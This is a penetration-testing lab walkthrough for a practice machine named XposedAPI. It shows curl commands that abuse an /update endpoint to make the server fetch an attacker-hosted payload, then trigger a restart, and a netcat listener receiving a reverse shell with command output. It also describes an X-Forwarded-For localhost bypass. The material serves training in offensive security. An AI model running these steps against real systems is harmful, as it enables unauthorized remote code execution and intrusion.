InfoSec LAB

XposedAPI_Exploitation

Created: 2 min read

SSRF to RCE

The target API server has been confirmed to be vulnerable as it accepts binary for execution in the context of update at the /update API endpoint. While the /update endpoint has a weak authentication mechanism using the user parameter, a valid system user has been identified through the /logs API endpoint, which is intended for internal use only. However, this restriction can be bypassed by the leveraging X-Forwarded-For header to trick the application into treating the request as if it originated from localhost.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/xposedapi]
└─$ curl -X POST -i http://$IP:13337/update -H 'Content-Type: application/json' -d '{"user":"clumsyadmin", "url":"http://192.168.45.215/update"}'
HTTP/1.1 200 OK
Server: gunicorn/20.0.4
Date: Thu, 06 Feb 2025 18:22:09 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 81
 
Update requested by clumsyadmin. Restart the software for changes to take effect.

Sending a GET request for update, with the payload

The target API server fetched the payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/xposedapi]
└─$ curl -X POST -i http://$IP:13337/restart
HTTP/1.1 200 OK
Server: gunicorn/20.0.4
Date: Thu, 06 Feb 2025 18:24:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19
 
Restart Successful.

Restarting

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/xposedapi]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.215] from (UNKNOWN) [192.168.209.134] 50800
whoami
clumsyadmin
hostname
xposedapi
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.209.134  netmask 255.255.255.0  broadcast 192.168.209.255
        ether 00:50:56:9e:c2:68  txqueuelen 1000  (Ethernet)
        RX packets 10484079  bytes 1014328857 (967.3 MiB)
        RX errors 0  dropped 1301  overruns 0  frame 0
        TX packets 10449999  bytes 1204935346 (1.1 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established to the target system as the clumsyadmin user via exploiting a vulnerable API server

Interactive Graph View

Backlinks